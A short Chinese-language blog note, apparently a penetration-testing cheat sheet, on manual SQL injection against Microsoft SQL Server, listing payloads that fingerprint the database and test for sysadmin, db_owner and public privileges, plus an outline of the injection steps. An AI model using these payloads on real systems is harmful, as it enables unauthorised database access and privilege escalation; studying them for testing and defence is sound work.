Microsoft SQL Server手注
与mysql主要不同是在语法
判断是否为Mssql数据库
and exists(select * from sysobjects) --
判断权限
and 1=(select is_srvrolemember('sysadmin')) //sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等 system
and 1=(select is_srvrolemember('db_owner')) //db权限:⽂件管理,数据库操作等 users-adminstrators
and 1=(select is_srvrolemember('public')) //public权限:数据库操作 guest-users
注入流程基本一致
1.判断注入
2.字段长度
3.寻找字符型显位
4.查询
借鉴一篇佳作https://www.naraku.cn/posts/67.html

浙公网安备 33010602011771号